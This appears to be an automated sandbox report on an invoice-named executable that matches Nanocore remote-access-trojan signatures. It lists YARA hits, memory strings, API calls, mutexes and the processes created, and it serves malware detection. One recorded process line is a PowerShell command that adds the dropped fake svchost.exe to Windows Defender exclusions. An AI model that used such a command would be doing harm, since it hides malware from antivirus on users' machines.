        Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.evad.winEXE@44/19@6/5
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 8_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTkJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{5c958888-f81c-42a4-939d-31983a2cd9ba}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17fJump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287989.exeReversingLabs: Detection: 27%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
